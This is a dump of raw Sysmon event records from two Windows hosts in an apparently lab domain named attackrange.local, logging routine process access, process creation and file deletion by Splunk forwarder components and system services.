16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245289Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245288Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245287Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245286Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245285Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245284Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245283Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-5130-6063-A122-00000000AF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245282Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5130-6063-A122-00000000AF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245281Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-5130-6063-A122-00000000AF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060683Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.500{7F8C56E7-5131-6063-1001-00000000AF01}26283960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060682Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8E19731F97DC8E46BD0F019E9ED88B6,SHA256=3CED9F5FC010540B778888135436227728E1E76EDDB35314A766C3759C3E5D76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060681Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5131-6063-1001-00000000AF01}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060680Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060679Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060678Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060677Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060676Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5131-6063-1001-00000000AF01}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060675Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.375{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5131-6063-1001-00000000AF01}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060674Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:25.377{7F8C56E7-5131-6063-1001-00000000AF01}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245310Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:25.984{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FBAD103596D1C592846BBE77B968B74,SHA256=937237FDAA165FF15B59096EDD420AB66EB2ADA292A2A98D226BD7C61C9B36D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245309Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:25.078{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61FF688D79663A6CE8AA618F1072B208,SHA256=7D6AAEFF0F580F8E2EEA29D748D75622BEEF8A73390DDCD5E4FB47DD2F8D3724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245308Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:25.078{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DE1615E07B556C483D0C6CAB47C6FE3,SHA256=852151088F64FE386D704DB4B31C7C9ED28293091E5F7C58D00820D79A000661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060692Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.735{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=279F22E3023EA35C220B95B3DD3425AE,SHA256=35C7EFF591B9DF46CB45FD93010A71C362CFC663BDED4A5EC94F1CAC8F200EB3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060691Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.063{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5132-6063-1101-00000000AF01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060690Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.063{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060689Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.063{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060688Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.063{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060687Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.063{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060686Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:26.063{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5132-6063-1101-00000000AF01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 